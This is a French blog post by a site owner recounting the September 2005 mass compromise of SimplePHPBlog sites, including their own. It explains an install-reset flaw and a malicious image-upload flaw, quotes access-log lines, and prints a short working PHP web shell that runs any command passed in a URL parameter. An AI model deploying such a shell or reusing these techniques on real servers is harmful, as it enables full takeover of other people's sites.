La faille
Une faille de sécurité
connue a été
utilisée contre le site principal de
SimplePHPBlog le 3 septembre 2005.
Ensuite un grand nombre de blogs utilisant
SimplePHPBlog ont été piratés dans les jours suivants (ce qui se traduit ici par ce
message à conserver en souvenir).
Les visiteurs venus d'ailleurs
Deux visites, le 4 septembre puis le 7 septembre:
weblog.bajoit.net 82.231.77.60 - - [04/Sep/2005:03:20:10 +0200] "GET /install00.php HTTP/1.1" 200 9355
weblog.bajoit.net 213.240.239.4 - - [07/Sep/2005:23:03:30 +0200] "GET /install00.php HTTP/1.1" 200 9388
Comment ça marche?
Une première faille permettait d'effacer un fichier créé lors de l'installation, de manière à forcer une nouvelle exécution des scripts d'installation. Il était alors possible de créer un nouvel utilisateur qui pouvait par exemple ajouter un message (ou pire).
Une seconde faille permettait d'importer (en tant que nouveau gestionnaire) comme image un fichier exécutable, qui pouvait à son tour accéder au serveur via
PHP.
Un bon exemple:
<?php
$cmd = $_GET['cmd'];
echo '<hr/><pre>';
echo 'Command: ' . $cmd;
echo '</pre><hr/><br>';
echo '<pre>';
$last_line = system($cmd,$output);
echo '</pre><hr/>';
?>.
Mais dans ce cas précis, les commandes PHP trop dangereuses sont
désactivées chez
PHPNET.
Pourquoi?
Beaucoup d'utilisateurs se demandent ou est le problème: qualité, open-source, système basé sur des fichiers texte?
En tout cas, la
publication de la faille a beaucoup aidé les pirates, et malgré tout il vaut mieux publier les failles que de les garder secrètes.
Et une version corrigée 4 jours après le problème ce n'est pas aussi bien que
Mozilla (qui a été capable de publier la version résistante à une faille en moins de 24 heures) mais ce n'est pas mal!